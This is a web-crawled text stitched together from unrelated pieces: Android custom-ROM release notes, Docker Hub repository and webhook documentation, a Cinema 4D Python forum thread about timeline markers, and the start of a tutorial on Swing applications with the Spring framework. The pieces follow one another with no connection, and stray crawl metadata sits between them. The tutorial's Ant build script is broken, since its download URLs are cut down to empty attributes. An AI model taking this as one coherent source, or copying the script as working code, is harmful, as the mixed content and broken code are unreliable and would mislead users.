ObjectPoolItem instance by the tag to see if it's possible to expand it.
Add the Tags
Get this working with bullets first, then you can add additional objects.
Reopen the ShipController script in MonoDevelop. In both
Shoot() and
ActivateScatterShotTurret(), look for the line:
GameObject bullet = ObjectPooler.SharedInstance.GetPooledObject();
Append the code so that it includes the
Player Bullet tag parameter.
GameObject bullet = ObjectPooler.SharedInstance.GetPooledObject(“Player Bullet”);
Return to Unity and click on the GameController object to open it in the Inspector.
Add one item to the new ItemsToPool list and populate it with 20 player bullets.
Click Play to make sure all that extra work changed nothing at all. :]
Good! Now you're ready to add some new objects to your object pooler.
Change the size of ItemsToPool to three and add the two types of enemy ships. Configure the ItemsToPool instances as follows:
Element 1:
Object to Pool: EnemyDroneType1
Amount To Pool: 6
Should Expand: Unchecked
Element 2
Object to Pool: EnemyDroneType2
Amount to Pool: 6
Should Expand: Unchecked
As you did for the bullets, you need to change the
instantiate and
destroy methods for both types of ships.
The enemy drones are instantiated in the
GameController script and destroyed in the
EnemyDroneController script.
You've done this already, so the next few steps will go a little faster. :]
Open the GameController script. In SpawnEnemyWaves(), find the enemyType1 instantiation code:
Instantiate(enemyType1, spawnPosition, spawnRotation);
And replace it with the following code:
GameObject enemy1 = ObjectPooler.SharedInstance.GetPooledObject("Enemy Ship 1"); if (enemy1 != null) { enemy1.transform.position = spawnPosition; enemy1.transform.rotation = spawnRotation; enemy1.SetActive(true); }
Find this enemyType2 instantiation code:
Instantiate(enemyType2, spawnPosition, spawnRotation);
Replace it with:
GameObject enemy2 = ObjectPooler.SharedInstance.GetPooledObject("Enemy Ship 2"); if (enemy2 != null) { enemy2.transform.position = spawnPosition; enemy2.transform.rotation = spawnRotation; enemy2.SetActive(true); }
Finally, open the EnemyDroneController script. Currently,
OnTriggerExit2D() just destroys the enemy ship when it leaves the screen. What a waste!
Find the line of code:
Destroy(gameObject);
Replace it with the code below to ensure the enemy goes back to the object pool:
gameObject.SetActive(false);
Similarly, in
OnTriggerEnter2D(), the enemy is destroyed when it hits a player bullet. Again, find Destroy():
Destroy(gameObject);
And replace it with the following:
gameObject.SetActive(false);
Hit the play button and watch as all of your instantiated bullets and enemies change from inactive to active and back again as and when they appear on screen.
Elon Musk would be envious your reusable space ships!
Where to go From Here?
Thank you for taking the time to work through this tutorial. Here's a link to the Completed Project.
In this tutorial, you retrofitted an existing game with object pooling to save your users' CPUs from a near-certain overload and the associated consquences of frame skipping and battery burning.
You also got very comfortable jumping between scripts to connect all the pieces together.
If you want to learn more about object pooling, check out Unity's live training on the subject.
I hope you found this tutorial useful! I'd love to know how it helped you develop something cool or take an app to the next level.
Feel free to share a link to your work in the comments. Questions, thoughts or improvements are welcome too! I look forward to chatting with you about object pooling, Unity and destroying all the aliens. | https://www.raywenderlich.com/847-object-pooling-in-unity | CC-MAIN-2021-17 | refinedweb | 2,843 | 55.84 |
User Details
- User Since
- Oct 14 2014, 7:04 AM (347 w, 4 d)
Oct 21 2020
Oct 20 2020
Oct 5 2020
Do you mean to improve the existing LLVM Jump Threading pass?
Yes, either improve current one or write new more powerful JT pass.
Sep 25 2020
This patch is not supposed to be used as is. It can be used for experiments and as a proof of concept. A version for reviewing will be submitted soon.
Sep 16 2020
Feb 15 2019
Jan 16 2019
Hi George,
Jan 15 2019
Nov 23 2018
+1, LGTM
I'd like someone from the X86 world to approve this as well.
Nov 21 2018
Hi Jonas,
Oct 31 2018
Hi Jonas,
May 14 2018
May 11 2018
We might need to play with _GLIBCXX_USE_CXX11_ABI=0 and the -Wabi-tag option to mitigate libstdc++ ABI issues.
Feb 27 2018
Sanjay,
Maybe it's worth to send the API change to llvm-dev as RFC?
Feb 21 2018
Just validated that it has fixed the issue.
Thank you, Peter.
Hi Peter,
Hi Sanjay,
Feb 20 2018
Hi Sanjay,
Feb 8 2018
Ping
Jan 31 2018
Ping
Jan 30 2018
Hi Eli,
Jan 24 2018
Hi Peter,
Jan 23 2018
Jan 22 2018
Jan 19 2018
Hi Joel,
Jan 18 2018
Thank you, Joel. The function to look at is make_list.
In SingleSource/Benchmarks/McGill/chomp the patch causes generation of subs+cmp_with_0 instead of only a subs.
The patch caused regressions in LNT benchmarks on Cortex-A9:
Jan 17 2018
Hi Sergey and Sanjoy,
Jan 16 2018
A reproducer:
Jan 15 2018
Jan 12 2018
I have found that the patch also caused 7.31% regression in SPEC2k6 401.bzip2 on Cortex-A57 (AArch64).
Jan 11 2018
Sergey,
Thank you for the initial analysis. I'll try to debug SCEV.
Jan 10 2018
Hi Sergey,
Jan 9 2018
The patch looks OK to me if using std::to_string is allowed now.
Dec 18 2017
Hi Shahid,
Dec 15 2017
Dec 14 2017
Hi Shahid,
Dec 5 2017
$ llc -O3 test_crash.ll llc: /home/llvm-test/tmp/llvm/lib/CodeGen/SelectionDAG/LegalizeDAG.cpp:1002: void (anonymous namespace)::SelectionDAGLegalize::LegalizeOp(llvm::SDNode *): Assertion `(TLI.getTypeAction(*DAG.getContext(), Op.getValueType()) == TargetLowering::TypeLegal || TLI.isTypeLegal(Op.getValueType()) || Op.getOpcode() == ISD::TargetConstant || Op.getOpcode() == ISD::Register) && "Unexpected illegal type!"' failed. ...
Hi Nirav,
Dec 4 2017
Dec 1 2017
There are stability and correctness issues on AArch64. The similar issues might exist on other ARM targets. Could you please disable MergeConsecutiveStores for all ARM targets including AArch64?
These changes caused failures of AArch64 NEON Emperor tests.
These changes caused Clang to crash when it compiled spec2006 403.gcc for AArch64. I am working on a reproducer.
LGTM
Nov 30 2017
A reproducer:
Nov 29 2017
Hi Nirav,
Nov 28 2017
Nov 22 2017
@evgeny777: I'll try to find some time to look at 401.bzip2.
Nov 9 2017
Nov 8 2017
I've got Spec2006 results for Cortex-A57:
Nov 3 2017
Cortex-A57 results from another private benchmark (50 sub-benchmarks):
I've got first results of benchmark runs: the LNT test suite + a private benchmark 01. I used the latest patch.
The configuration is a Juno board Cortex-A57/A53, v8-a, AArch32, Thumb2.
Options: -O3 -mcpu=cortex-a57 -mthumb -fomit-frame-pointer
The runs passed without errors.
Oct 31 2017
I'll do AArch32/AArch64 benchmarks runs on our Juno boards. It would be worth to run CTMark to check compilation time.
Oct 27 2017
Hi Max,
Hi Max,
Oct 26 2017
I attached
The benchmark source file:
Hi,
This patch caused SingleSource/Benchmarks/Shootout/shootout-sieve regression on Arm public bots:
Oct 14 2017
The patch has caused a few regressions on Arm too. They are within 5%. We investigated some of them. For example, the unrolling is not applied. However the unrolling could figure out that some non-free GEPs are removed during optimisation. Maybe other passes have the similar problem. We currently need more precise cost model for inlining at Oz. However we started looking at the recently introduced TTI code size cost if we can use it.
At which optimisation level is the inlining affected? Could we fix the issues by updating the heuristics?
Oct 5 2017
Thank you, Justin.
Oct 4 2017
Hi Justin,
Oct 3 2017
Thank you, Jun, for fixing this.
There is PR33642 with a test case when TCC_FREE is returned for non-cost free GEPs.
Thank you, Eli.
Oct 2 2017
Ping
Sep 26 2017
Sep 25 2017
Sep 1 2017
Thank you, Renato, for clarifying that.
LGTM.
BTW the issue was found during porting micropython for Cortex-M0 from GCC to Clang.
Aug 25 2017
As this patch can affect ARM targets I am doing some benchmarking.
I've got the LNT benchmarks results for AArch64 (Cortex-A57). There is no difference in performance. I'll have got more results soon.
It's interesting to see what benchmarks has been used to measure the improvements.
LGTM
Thank you, Haicheng.
Aug 24 2017
Thank you, Eli. | https://reviews.llvm.org/p/eastig/ | CC-MAIN-2021-25 | refinedweb | 851 | 75.61 |
Intro
Debugging applications is a natural part of the cycle of writing software. One simply cannot anticipate every single problem users are going to run into while using a piece of software.
For rock, since we compile to C, we can use traditional debugging tools like gdb, and the next few sections explain exactly how.
Debug symbols
By default, rock compiles in the debug profile. The corresponding command line option is -pg.
Not only will this pass the corresponding option to the C compiler used (gcc, clang, etc.) but it will also:
- Add #line directives for debuggers to map back to .ooc files
- Keep the produced C files around for further inspection.
- On Linux, it’ll add -rdynamic so that all symbols are exported
- On OSX, it’ll run dsymutil so that a .dSYM archive will be produced, containing debug symbols.
When releasing a production build of your software, use the release profile instead:
rock -pr
This will omit debug symbols.
Fancy backtraces
While the next sections cover using a debugger, which is a prerequisite for pretty much all hardcore problem-solving sessions, there is a way to get information about program crashes without using a debugger.
The fancy-backtrace rock extension produces output like this when a program crashes:
    [OutOfBoundsException in ArrayList]: Trying to access an element at offset 0, but size is only 0!
    [fancy backtrace]
    0   fancy_backtrace.c (from C:\msys64\home\amwenger\Dev\rock\bin\fancy_backtrace.DLL)
    1   BacktraceHandler backtrace_impl() in lang/Backtrace (at C:/msys64/home/amwenger/Dev/rock/sdk/lang/Backtrace.ooc:50)
    2   BacktraceHandler backtrace() in lang/Backtrace (at C:/msys64/home/amwenger/Dev/rock/sdk/lang/Backtrace.ooc:243)
    3   Exception addBacktrace_impl() in lang/Exception (at C:/msys64/home/amwenger/Dev/rock/sdk/lang/Exception.ooc:108)
    4   Exception addBacktrace() in lang/Exception (at C:/msys64/home/amwenger/Dev/rock/sdk/lang/Exception.ooc:212)
    5   Exception throw_impl() in lang/Exception (at C:/msys64/home/amwenger/Dev/rock/sdk/lang/Exception.ooc:177)
    6   Exception throw() in lang/Exception (at C:/msys64/home/amwenger/Dev/rock/sdk/lang/Exception.ooc:232)
    7   ArrayList get_impl() in structs/ArrayList (at C:/msys64/home/amwenger/Dev/rock/sdk/structs/ArrayList.ooc:82)
    8   ArrayList get() in structs/ArrayList (at C:/msys64/home/amwenger/Dev/rock/sdk/structs/ArrayList.ooc:40)
    9   __OP_IDX_ArrayList_Int__T() in structs/ArrayList (at C:/msys64/home/amwenger/Dev/rock/sdk/structs/ArrayList.ooc:290)
    10  foo() in crash (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:32)
    11  bar() in crash (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:41)
    12  App runToo_impl() in crash (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:72)
    13  App runToo() in crash (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:84)
    14  __crash_closure403() in crash (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:67)
    15  __crash_closure403_thunk() in crash (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:66)
    16  loop() in lang/Abstractions (at C:/msys64/home/amwenger/Dev/rock/sdk/lang/Abstractions.ooc:2)
    17  App run_impl() in crash (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:65)
    18  App run() in crash (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:80)
    19  main() in (at C:/msys64/home/amwenger/Dev/rock/test/sdk/lang/crash.ooc:1)
    20  crtexe.c (from C:\msys64\home\amwenger\Dev\rock\test\sdk\lang\crash.exe)
    21  crtexe.c (from C:\msys64\home\amwenger\Dev\rock\test\sdk\lang\crash.exe)
    22  BaseThreadInitThunk (from C:\Windows\system32\kernel32.dll)
    23  RtlUserThreadStart (from C:\Windows\SYSTEM32\ntdll.dll)
In the case above, the faulty access is easy to spot: the indexing in foo() at crash.ooc line 32, together with the full chain of calls that led there.
Fancy backtraces work on Windows, Linux, and OSX, on both 32 and 64-bit machines.
To use it, simply go in the rock directory and do:
make extensions
A few dependencies might be needed, such as binutils-dev and zlib1g-dev on Debian, or a few brew formulas on OSX.
Fancy backtrace principle
Basically, whenever an exception is thrown, a backtrace is captured. It contains a list of frames, e.g. the addresses of the various function calls (as can be seen above).
If an Exception isn’t caught, the program will abort, but before it does, the backtrace captured when the exception was thrown is formatted nicely and printed out to the standard error stream.
Similarly, when the program receives a signal (such as SIGSEGV), a backtrace is printed to help the developer know where things went wrong.
Since fancy-backtrace has more dependencies than rock itself, it’s a little bit harder to build, and that’s why it exists as a dynamic library (a .dll file on Windows, .dylib on OSX, and .so on Linux).
When a program compiled in the debug profile starts up, it attempts to load the library. If it succeeds, it will use it to display friendly stack traces. If it doesn’t, it will fall back to the execinfo interface (which displays only function names, not source files or line numbers), or to… nothing, on Windows.
By default, the fancy_backtrace.{dll,so,dylib} file is copied next to the rock binary, in ${ROCK_DIST}/bin. An ooc executable will first look in its own directory (useful if the application is distributed on a system that doesn't have rock), and will then search in the directory where the rock executable resides (useful on a developer system).
Fancy backtrace configuration
The default setting is to display something as helpful as possible. However, if one wants unformatted backtraces, one may define the RAW_BACKTRACE environment variable:
RAW_BACKTRACE=1 ./myprogram
To disable the usage of fancy-backtrace altogether, one may use the NO_FANCY_BACKTRACE environment variable:
NO_FANCY_BACKTRACE=1 ./myprogram
Crash course in gdb
GDB, the GNU Debugger, is the canonical tool to debug C applications compiled with gcc (or even clang).
For example, writing this in dog.ooc:
    Dog: class {
        shout: func {
            raise("Woops, not implemented yet")
        }
    }

    main: func {
        work()
    }

    work: func {
        Dog new() shout()
    }
Compiling with rock -pg gives an executable, dog, and a folder with C files.
Running
We can run it with gdb like this:
gdb dog
If we wanted to pass arguments, we could do:
gdb --args dog arg1 arg2 arg3
Inside gdb, we are greeted with a prompt. Typing run (or r for short), followed by a line feed, runs the program. In this case, it aborts and tells us where it failed:
    (gdb) r
    Starting program: /Users/amos/Dev/tests/dog
    Reading symbols for shared libraries +.............................. done
    [Exception]: Woops, not implemented yet
    Program received signal SIGABRT, Aborted.
    0x00007fff96b82d46 in __kill ()
Getting a backtrace
However, as-is, we don't know much. So it died in __kill, which seems to be a system function on OSX (where this doc was written). How about a nice backtrace instead? Running backtrace (or simply bt) will give you that:
    (gdb) bt
    #0  0x00007fff96b82d46 in __kill ()
    #1  0x00007fff8edfadf0 in abort ()
    #2  0x0000000100007121 in lang_Exception__Exception_throw_impl (this=0x100230030) at Exception.ooc:205
    #3  0x00000001000072a3 in lang_Exception__Exception_throw (this=0x100230030) at Exception.ooc:241
    #4  0x0000000100008090 in lang_Exception__raise (msg=0x100231600) at Exception.ooc:104
    #5  0x0000000100000e9b in dog__Dog_shout_impl (this=0x100238ff0) at dog.c:3
    #6  0x0000000100000ef0 in dog__Dog_shout (this=0x100238ff0) at dog.ooc:11
    #7  0x0000000100001131 in dog__work () at dog.ooc:12
    #8  0x0000000100001102 in main (__argc2=1, __argv3=0x7fff5fbff230) at dog.ooc:8
From left to right, we have: the frame number, the address of the function (which we can ignore), the name of the function, the arguments and their values, and finally the file where each function is defined (if it can be found) along with the line number.
Reading code with context
As expected, we can see ooc line numbers in the backtrace. What if we want to investigate the code without opening the .ooc file ourselves? We can just place ourselves in the context of frame 7 with frame 7, or simply f 7:
    (gdb) f 7
    #7  0x0000000100001131 in dog__work () at dog.ooc:12
    12      Dog new() shout()
Want more context, e.g. the lines of code around? Use list (or simply l):
    (gdb) l
    7   main: func {
    8       work()
    9   }
    10
    11  work: func {
    12      Dog new() shout()
    13  }
    (gdb)
Inspecting values
GDB can also print values. For example, going back to frame 2, we can inspect the exception being thrown by using print (or p, for short):
    (gdb) f 2
    #2  0x0000000100007121 in lang_Exception__Exception_throw_impl (this=0x100230030) at Exception.ooc:205
    205     abort()
    (gdb) p this
    $4 = (lang_Exception__Exception *) 0x100230030
Getting an address is not that useful, though, how about printing the content of an object instead? We can dereference the object from within gdb:
    (gdb) p *this
    $10 = {
      __super__ = {
        class = 0x100047e60
      },
      backtraces = 0x100234f40,
      origin = 0x0,
      message = 0x100231600
    }
What if we want to read the message? Since it’s an ooc String, we’ll need to print the content of the underlying buffer:
    (gdb) p *this.message._buffer
    $11 = {
      __super__ = {
        __super__ = {
          class = 0x100047490
        },
        T = 0x1000478c0
      },
      size = 26,
      capacity = 0,
      mallocAddr = 0x0,
      data = 0x10002fe24 "Woops, not implemented yet"
    }
Inspecting generics
Inspecting generics is a bit trickier: one has to cast them directly to the right type. For example, the Exception class has a LinkedList of backtraces, which is a generic type. We can inspect it:
    (gdb) p *this.backtraces
    $21 = {
      __super__ = {
        __super__ = {
          __super__ = {
            __super__ = {
              class = 0x10004b2b0
            },
            T = 0x100047df0
          }
        },
        equals__quest = {
          thunk = 0x10001a660,
          context = 0x0
        }
      },
      _size = 0,
      head = 0x100239f60
    }
Not so useful. What about head?
(gdb) p *this.backtraces.head
$22 = { __super__ = { class = 0x10004b4a0 }, T = 0x100047df0, prev = 0x100239f60, next = 0x100239f60, data = 0x100238fe0 "" }
Looks like a node from a doubly-linked list. We’re on the right track! However,
data is printed as a C string (since generics are
uint8_t* under the hood, and
uint8_t is usually typedef’d to
char). We can cast it:
(gdb) p (lang_types__Pointer) *this.backtraces.head.data
$24 = (lang_types__Pointer) 0x0
Which seems about right, as the exception has not been re-thrown (obviously the example here is rather specific, but the general techniques can be applied to any ooc application).
Breakpoints
What if we want to inspect values somewhere the program wouldn’t stop naturally?
In the program above, we could set up a breakpoint when the constructor of
Dog
is called.
It can be non-trivial to determine the C symbol corresponding to an ooc function.
Tab-completion is here to the rescue though - typing
break dog_ and then hitting
Tab twice will display a helpful list of symbols:
(gdb) break dog_<TAB><TAB>
dog__Dog___defaults__       dog__Dog___load__   dog__Dog_init   dog__Dog_shout        dog__work
dog__Dog___defaults___impl  dog__Dog_class      dog__Dog_new    dog__Dog_shout_impl   dog_load
Here, we seem to want
dog__Dog_new. As a rule, we have
packagename__ClassName_methodName_suffix.
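That mapping can be sketched as a tiny helper (Python used purely as illustration here; the pattern is the observed convention above, not an official mangling specification):

```python
def ooc_symbol(package, class_name=None, method=None, suffix=None):
    # Observed convention: packagename__ClassName_methodName_suffix
    sym = package
    if class_name:
        sym += "__" + class_name
    if method:
        sym += "_" + method
    if suffix:
        sym += "_" + suffix
    return sym

print(ooc_symbol("dog", "Dog", "new"))            # dog__Dog_new
print(ooc_symbol("dog", "Dog", "shout", "impl"))  # dog__Dog_shout_impl
```

Both outputs match symbols from the tab-completion list above.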
Setting up the break point does nothing until we run the program:
(gdb) break dog__Dog_new
Breakpoint 1 at 0x100000f3a: file dog.ooc, line 1.
(gdb) r
Starting program: /Users/amos/Dev/tests/dog
Reading symbols for shared libraries +.............................. done
Breakpoint 1, dog__Dog_new () at dog.ooc:1
1   Dog: class {
Stepping
From there, we can investigate as before, with backtrace, frame, and so on. step will enter the functions being called, whereas next will skip them and return to the prompt when the functions have fully executed.
The shorthand for
step is
s, and the shorthand for next is
n. When we step, we can see everything
being executed, including string and object allocation:
(gdb) s
dog__Dog_class () at dog.ooc:25
Line number 25 out of range; dog.ooc has 13 lines.
(gdb)
Line number 26 out of range; dog.ooc has 13 lines.
(gdb)
Line number 27 out of range; dog.ooc has 13 lines.
(gdb)
lang_types__Object_class () at types.ooc:55
55      if(object) {
(gdb)
dog__Dog_class () at dog.ooc:28
Line number 28 out of range; dog.ooc has 13 lines.
(gdb)
Line number 29 out of range; dog.ooc has 13 lines.
(gdb)
lang_String__makeStringLiteral (str=0x10002fe20 "Dog", strLen=3) at String.ooc:377
377     String new(Buffer new(str, strLen, true))
(gdb)
lang_Buffer__Buffer_new_cStrWithLength (s=0x10002fe20 "Dog", length=3, stringLiteral__quest=true) at Buffer.ooc:59
59      init: func ~cStrWithLength(s: CString, length: Int, stringLiteral? := false) {
(gdb)
lang_Buffer__Buffer_class () at Buffer.ooc:157
157     clone: func ~withMinimum (minimumLength := size) -> This {
(gdb)
158     newCapa := minimumLength > size ? minimumLength : size
(gdb)
163     copy
(gdb)
0x00000001000050dd in lang_Buffer__Buffer_new_cStrWithLength (s=0x10002fe20 "Dog", length=3, stringLiteral__quest=true) at Buffer.ooc:59
59      init: func ~cStrWithLength(s: CString, length: Int, stringLiteral? := false) {
(gdb)
lang_types__Class_alloc__class (this=0x100047490) at types.ooc:54
54      object := gc_malloc(instanceSize) as Object
(gdb)
Note that some line numbers seem to be problematic here - but we still get to see which parts of the
code get executed and in which order. Instead of typing
s every time, we can just hit Enter to
re-execute the last command.
When we’re done stepping and just want to resume program execution, we can use
continue (or
c for short).
Quitting
When we’re done running gdb, we can quit with
quit (or
q for short). It might ask for confirmation
if the program is still running, but otherwise, it’s all good.
Attaching to a process
Up to there, we have seen how to run a program from gdb. What if we want to attach gdb to a process that has been
launched somewhere else? Let’s try with this program,
sleep.ooc:
import os/Time

main: func {
    while (true) {
        doThing()
        Time sleepSec(1)
    }
}

doThing: func {
    "Hey!" println()
}
Compiling it with
rock -pg and running it with
./sleep prints
Hey! every second, as expected.
To attach to this process, we need to find out its process ID. We can either use the
ps command line
utility, or we can interrupt its execution with
Ctrl-Z (in most shells, like bash, zsh, etc.). You
might see something like this:
amos at coyote in ~/Dev/tests
$ ./sleep
Hey!
Hey!
Hey!
^Z
[1]  + 48130 suspended  ./sleep
And the process ID is
48130 here. We can attach gdb to that process like this:
gdb attach 48130
When attaching to a process, GDB will pause execution, waiting for orders. Quitting gdb will then detach gdb from the process, which will resume execution.
If you need to quit the process, you can bring it back to the front with the
fg shell
command, then exit it with
Ctrl-C.
Other tips
ooc vs C line numbers
By default, rock will output ‘sourcemaps’, mapping C code back to the original ooc code that generated it. This allows the debugger to display ooc line numbers, as seen above. This behavior can be disabled with:
rock --nolines
In which case gdb will fall back to displaying C line numbers (corresponding to the files generated by rock). This can be useful if you suspect that rock is generating invalid code, or if the ooc line numbers are messed up for some reason. | https://ooc-lang.org/docs/tools/rock/debug/ | CC-MAIN-2018-51 | refinedweb | 2,451 | 66.44 |
Loading OBJ files and displaying meshes in Viewport help
Posted Thursday, 13 February, 2014 - 20:46 by Rogad
Hi everyone :)
Just discovered OpenTK today after going around a lot of places. I got the tutorial starter program working fine with the triangle.
I'm just thinking now about more complex things.
Short story - I am building an animated talking head using OBJ files and morph targets. I have got this all working in C# with WPF. All well and good, but the performance whilst okay, could do with a speed injection so I can add more features to my talking head.
Anyway, so now I am looking at OpenTK, which I understand will use the graphics card. I'm still learning 3D but understand some of the basics.
I understand what makes up a mesh and I have been using Helix 3D Toolkit with WPF. But like I said my code is not that fast.
So it's back to Windows Forms as the OpenTK toolkit doesn't really seem to need the WPF 3D functions despite me liking them make my life easy. ;)
But I need a new OpenTK method of importing an OBJ file. I found an OBJ mesh loader here :
Given all this, once I have loaded the OBJ into a mesh, how do I go about displaying it in the Viewport ?
Could someone possibly give me some sample code ? If so that would be great !
Thanks for reading :)
Re: Loading OBJ files and displaying meshes in Viewport help
I found this page, which is where the OBJ importer code comes from originally :
I grabbed the two cs files and they are now in my project. I had to update some of it, as the 'math' had been moved to the OpenTK namespace, but the code essentially remains the same. The project builds without errors, except I just get a black window.
Here's my Program.cs :
The model is on the desktop, it's made with quads. It's a human figure model. But yeah, I am probably making a noob mistake or the OBJ importer is not working.
I thought maybe someone could have a glance at my code above. Am I right in thinking that the game.RenderFrame is called continuously ? I guessed that is a loop so put the render call in there.
I imagine I need to be setting up a camera or something somehow ? I have no idea what the Ortho line does yet maybe that is where I am going wrong :/
Cheers :)
Re: Loading OBJ files and displaying meshes in Viewport help
This is correct, UpdateFrame and RenderFrame are called in a loop until you call Exit().
If you want to use WinForms or WPF, then you should add a reference to OpenTK.GLControl and drag-drop a GLControl on your Form/WindowsFormsHost. The GameWindow is meant to be used standalone.
GL.Ortho is an OpenGL 1.x call that sets up an orthographic projection. If the model is not visible it might be that it falls outside of your camera frustum (e.g. behind the camera or outside the left/right/top/bottom/far planes.) Try something like:

GL.Ortho(-1, 1, -1, 1, -1024, 1024);
Chapter 3 of the Red Book covers this topic in more detail. The OpenGL wiki is another useful resource mostly focused on modern, shader-based OpenGL.
Re: Loading OBJ files and displaying meshes in Viewport help
Hi,
Thanks for the reply and the explanations. Currently I am just playing with the standalone window, trying to get this importer to work. I found the tutorial for the GLControl. I'll take a look at those links too.
I tried
GL.Ortho(-1, 1, -1, 1, -1024, 1024);
But I still get a black screen.
With the window are the camera controls linked to the mouse or is that something you have to build ?
I thought maybe I could go hunting for the model if it's even there.
Cheers.
Re: Loading OBJ files and displaying meshes in Viewport help
Not out of the box. OpenTK allows you to program the GPU using low-level OpenGL commands - it's not a high level toolkit like WPF.
That said, building a camera is not very difficult. Google for "OpenTK camera".
I would suggest testing the camera on a simple example like VBOStatic.cs before you test the obj reader, just in case there is a bug in the reader.
Re: Loading OBJ files and displaying meshes in Viewport help
I just thought, should I be adding a light to the game window or is there a light already set up ?
Re: Loading OBJ files and displaying meshes in Viewport help
Lighting is disabled by default. When lighting is disabled, vertices are colored using GL.Color4() (IIRC, the default is white).
Re: Loading OBJ files and displaying meshes in Viewport help
OK then I should be seeing something if there's anything there. I think I will do some of the tutorials and come back to this. Thanks for your help.
Re: Loading OBJ files and displaying meshes in Viewport help
Try this in your setup viewport, and move your cam position (the new Vector3 x, y, z positions) so you can change your view; maybe the model is not in the camera region.
#include <std/disclaimer.h>
/*
* I am not responsible for bricked devices, dead SD cards, thermonuclear
* war, or the current economic crisis caused by you following these directions.
* YOU are choosing to make these modificiations, and if you point your finger at
* me for messing up your device, I will laugh at you.
*/
Changelog:
1.6.26:
1.4.26.1:
_Corrected mount points in kernel: Camera pics saved on internal
_Minor fixes in kernel
_NTFS module for testing (may not work)
1.4.26:
_Fixed Bootloop issue (Removed EXT4 Tweaks for now)
_Fixed ICS Long Press Home Key in Phone Mode
_Mount Points reverted back to original
_Re-stabilized
_Updated Google Maps
1.4.25:
_Fixed root issues. Everyone should get proper root coming from any ROM.
_LP6 Rooted & Modded Kernel (on test; soon to be replaced with open source kernel)
_EXT4 Tweaks applied on second boot (long press power key if you get stuck)
_External SD card mount point is now /mnt/sdcard (following CM9 standards)
_Internal SD card mount point is now /mnt/emmc (following CM9 standards) Your titanium Backup location may need to be changed.
_Superuser app is back with Root Browser.
_X-plore removed. Can be installed from market though.
_GPS should be better. Don't expect to be perfect yet.
_Recording format set to "MP4".
_Updated Google apps and other apps.
_Fixed mobile data toggle not updating for serious
_Fixed navigation buttons for tablets
_Long press home options added to General Interface for phones that have hardware buttons
_Fixed icon transparency being applied to right-side buttons (BT, etc)
_Add BT MAP Profile
_Fixed
_Bluetooth: Fixed memory leak and file handles leak
_Nav bar & tablet status bar FCs fixed
_Fixed some init.d scripts not running due to lack of bash
_Changing brightness by sliding on the top of the statusbar (if enabled) shouldn’t FC anymore
_Added bluetooth headset config
_Other fixes of AOKP build 33 which where not included.
1.4.19:
_Beta Testing Completed!
_Complete AOKP compiled (no separate patches from CM9)
_Added missing fonts
_Services.jar patched for OOM Tweaking
_DSP Manager removed
_Updated Apps: Google Maps, Xplore and Videos
(New Feature)
_Quiet Hours: Configure the hours your device should be quiet and/or still
_Statusbar: Added ability to WeatherPanel to start a custom app
_Statusbar: Added ability to hide signal bars
_Statusbar: Customizable font size
_Statusbar: Customizable icon transparency
_Added German translation for weather
_Fix CRT Off Animation
_Fix embedded flash on websites
_Fix compass
_Fix disabling Camera Sounds
_Fix camera internal issues
_Other small fixes
Beta 5.0 (14/4/2012):
_Android 4.0.4 - Complete New Build
_Big Big Update, Wipe Wipe Data!!
_Market purchase fixed
_Changing Lockscreen Wallpaper fixed
_Navigation bar overhaul (ability to set custom actions/icons and long-press actions)
_DSP Manager re-implemented (on test - please review this if you use this)
_Other AOKP Fixes - Complete sync upto build 31
_All scripts revised.
_Media scanner and media server related scripts removed as it's fixed internally.
_Updated apps. Modded market replaced with original one (to ensure proper purchase)
_Framework Fixes
_Dalvik Fixes
_Media Server Fixes
_Gallery FC Fixes
_Service Manager Fixes
_Embedded Flash Player Fixes (Not completely tested)
Beta 4.5 (11/4/2012):
_Reverted system apps to 4.0.3. Fixed FCs.
Beta 4.4 (10/4/2012):
_Integrated 95% of system apps from 4.0.4 (Framework base is still 4.0.3)
_Services.jar patched to improve OOM. (Better RAM management and kill lag)
_Kernel Tweaks. Default Governor - Ondemand.
_CPU Tweaks. Both cores set online on each boot.
_I/O Scheduling set to "Deadline".
_Application boost tweaks - Faster zipaligning on every boot and optimizing database.
_EXT4 Tweaks re-added (were removed in 4.3) to boost I/O.
_GMail and Play Store updated.
_Euphoria Control updated to integrate viewing calendar events on lockscreen. Changing LS wallpaper still FCs.
_Device Settings separated from Euphoria Control and available directly in system settings app.
_Root-browser removed as not compatible with SuperSU. Use Xplore from Market instead.
_Overall smoothness and response greatly increased. Blazing fast and rock stable.
_STK (Sim Toolkit) implemented and added.
_Torch app & File manager app added.
_OTG Support testing. Check /mnt/usbdisk.
_Launcher FC on reboot fixed. Latest Apex launcher.
_Launcher with increased heap size and zero lag. These tweaked settings will vanish if you update launcher.
_Modem Auto-Install Removed.
_New updater-script. Thanks to antiochasylum for graphics.
Beta 4.3 (3/4/2012):
_LP5 Kernel Auto-Install - 1.4 GHz Dual Core Activated
_LP5 Modem Auto-Install
_Market Fixed for missing apps
_Camera Fixes for LP5 Kernel
_LP5 RIL Library added
_WiFi Fixes
Beta 4.2 (1/4/2012):
_Camera Recording Fixed.
_Added SuperNote for Tablet Mode and FreeNote for PhoneUI Mode.
_Audio Fixes.
_DSP manager removed due to some instability.
_First boot freeze at boot animation fixed.
_Market fixes.
_Minor media enhancements.
_This is not a new build rather fixes over previous build.
Beta 4.1 (29/3/2012):
_Added missing toggles: Data, 2G/3G, Tethering.
_Added missing fonts.
_Zip-aligned all apps.
Beta 4 (29/3/2012):
_Complete new build with new device tree.
_Lot's of source work & fixes.
_Complete native USB Mass Storage. Removed UMS app developed by us.
_New RIL base from I220 ICS Leak. Before this we were using SGS2 RIL base.
_Storage option in settings don't FC.
_New options to explore in Euphoria Control (EC).
_Synced with AOKP-28
_DSP Manager added and working.
_Hardware keys backlight on by default. To turn it off use Device Settings in EC.
_Greatly increased I/O and thus quadrant if at all it matters.
_Updated few apps.
_Market fixes. No more error while installing app from market.
Beta 3 (20/3/2012):
_USB Mass Storage using our app. Both external and internal mount!
_Nova Launcher replaced with Apex Launcher.
_Maps and Youtube added. Working.
_+ Titanium Backup works. Still have minor issue with some.
_Some minor tweaks
Beta 2 (18/3/2012):
